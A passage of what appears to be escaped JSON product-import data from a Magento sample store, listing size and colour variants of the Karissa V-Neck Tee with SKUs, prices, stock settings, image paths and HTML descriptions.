,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws10-red_back.jpg\",\"image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws10-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1467\":{\"sku\":\"WS10-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-S-Yellow\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1468\":{\"sku\":\"WS10-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-M-Green\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1469\":{\"sku\":\"WS10-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-M-Red\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws10-red_back.jpg\",\"image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws10-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1470\":{\"sku\":\"WS10-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-M-Yellow\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1471\":{\"sku\":\"WS10-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-L-Green\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1472\":{\"sku\":\"WS10-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-L-Red\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws10-red_back.jpg\",\"image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws10-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1473\":{\"sku\":\"WS10-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-L-Yellow\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1474\":{\"sku\":\"WS10-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-XL-Green\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1475\":{\"sku\":\"WS10-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-XL-Red\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 